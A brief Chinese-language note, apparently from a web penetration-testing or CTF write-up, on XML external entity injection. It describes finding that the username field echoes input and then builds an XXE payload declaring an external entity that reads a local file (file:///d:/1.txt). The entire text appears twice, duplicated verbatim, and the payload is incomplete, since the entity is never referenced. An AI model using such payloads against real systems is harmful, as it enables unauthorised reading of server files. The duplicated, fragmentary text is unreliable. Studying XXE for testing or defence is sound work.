1.抓包看回显
多次尝试发现用户名位置有回显,而后面密码字段就无回显
构建payload
<?xml version="1.0"?>
<!DOCTYPE user [<!ENTITY test SYSTEM "file:///d:/1.txt"> ]>
1.抓包看回显
多次尝试发现用户名位置有回显,而后面密码字段就无回显
构建payload
<?xml version="1.0"?>
<!DOCTYPE user [<!ENTITY test SYSTEM "file:///d:/1.txt"> ]>